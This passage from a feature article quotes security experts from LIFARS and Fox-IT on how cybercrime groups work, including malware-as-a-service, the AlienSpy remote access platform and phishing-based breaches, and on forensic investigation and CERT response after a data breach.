For example, these Russian individuals (pictured left), who operated a large botnet (photo courtesy of LIFARS), were not that computer-savvy. The majority of cybercriminals are either part of an organized crime ring or small group looking to make quick buck, he said. Crime rings generally use more sophisticated malware that is custom-developed for them or purchased on the Dark Web, and they tend to operate out of Eastern Europe, Russia, Africa and China. Individuals or small groups involved with cybercrime typically purchase exploit kits or subscribe to ready-to-use platforms.

Most cybercriminals are after money, and especially in poorer regions of the world, cybercrime is a lucrative business, Krehel said.

"The laws are loose, and most of the time they do not have to worry about getting prosecuted, which further motivates them," Krehel said.

For example, there is no extradition law in Russia, making the country a safe haven for cybercriminals.

"Besides money, cybercriminals are often after personal information that can be sold or abused for fraudulent purposes," Krehel said. "This includes credit card numbers, addresses and social security numbers."

Cybercriminals frequently resell this information instead of using it themselves to lower the risk of getting caught, he added.

What's frightening for targeted businesses is that hostile or intrusive software groups now operate like businesses. Cybercriminals advertise and distribute malware-as-a-service as if it were legitimate commercial software. They also use crime packs with business intelligence reporting dashboards to manage the distribution of their malicious code. Exploit kits come with technical installation guides, how-to videos and even technical support.

"There is a very active underground market where suppliers and buyers of malicious software, personal information, networks of already infected computers, and basically anything you would need for a successful cyberattack, find each other," Kevin Jonkers, forensics and incident response manager at the Amsterdam, Netherlands-based cyber intelligence firm Fox-IT, explained.

For the most advanced attacks, it is not uncommon for criminals to hire a skilled hacker to write custom malware crafted to compromise a specific victim, he said. That means that even without the technical skills required to carry out a cybercrime, with the right amount of money, anyone can become a successful cybercriminal.

"Given the ease of remaining anonymous while perpetrating these crimes, one can imagine how attractive this world is to the modern-day criminal," Jonkers said.

Financial institutions are desired targets for hackers these days, and platforms such as the now defunct AlienSpy allow cybercriminals with no or minimal computer skills to carry out attacks that can cause great damage to financial institutions. AlienSpy, a Remote Access Trojans platform often deployed through phishing campaigns, charges a monthly service fee of just $19.99 to $219.99, and gives criminals the ability to steal large sums of money, Krehel explained.

"The platform allowed users to share successful targets with each other, so an institution that was successfully breached might see several dozen instances of the same type of attack taking place at the same time but by different attackers," he said.

Jonkers added that criminals use a variety of techniques to breach an organization's IT infrastructure, and if they're very persistent, they are very likely to succeed at some point.

"An attacker that targets your organization will usually go through several stages to breach your infrastructure," he said. "After gathering information about its target, a determined hacker will usually deploy an attack using the methods that are most likely to succeed."

These methods can range from using simple, easily detectable tools, to advanced malware that is designed to remain undetected for long periods of time.

The now defunct AlienSpy platform allowed cybercriminals with no or minimal computer skills to carry out attacks that can cause great damage to financial institutions.

An attacker that wants to target a specific organization will usually perform extensive reconnaissance in order to identify the target's weak points – in most cases, those weak points are Internet-facing systems or the systems used on employees' laptops and desktop computers.

Data breaches tend to start with phishing emails aimed at tricking users to either give up their credentials or open a file containing an exploit that downloads malware onto the computer. "These methods are not very sophisticated, but they are extremely effective," Krehel noted.

The malicious program gives the attacker full control over the employee's system and acts as an entry point into the IT network. From there, the hacker will attempt to gather more access rights and search through the network for interesting information.

Jonkers gave an example where an HR employee received a response from a job seeker to an open position. The email had a resume attached, but by opening the resume, the employee installed a malicious program.

"From this point, the attacker had inside access to the IT network of his target," Jonkers said. "For several days, the attacker combed through the network for the crown jewels of the organization, in this case, medical intellectual property."

Several months after the breach, a highly valued IP was up for sale on the black market.

So what takes place after a data breach? Krehel said that once the forensic team arrives, the investigation starts, where the primary objective is to limit access to compromised systems, understand the attacker's profile (whether it was state-sponsored or financially-motivated), secure evidence and plan steps for future evidence preservation.

"A damage assessment of the business and technological areas reveals how deeply the attacker was able to penetrate the network and laterally move into compromised network systems," Krehel said.

While the forensic teams investigate, executives will follow the data breach plan and prepare the public relations, privacy and legal actions needed.

"This is not an easy task – the wrong message can trigger an avalanche of negative actions and sanctions," Krehel advised.

Jonkers added that after a data breach, a Computer Emergency Response Team is often called in to lead the investigation and mitigation of the incident. Larger organizations might have their own CERT, but small- to medium-sized organizations usually rely on external CERTs. Making a skilled and trained CERT available is of paramount importance for efficient incident handling.

"If your organization is not able to support its own CERT, make sure to have an external CERT on stand by and preferably, on retainer," Jonkers added.

Krehel noted, "A data breach is a C-suite exercise, and tests the coherence and conciseness of the incident response preparedness of the enterprise to function in crisis mode. Unfortunately, it is mostly a live exercise, not a simulated test, and real learning comes at price."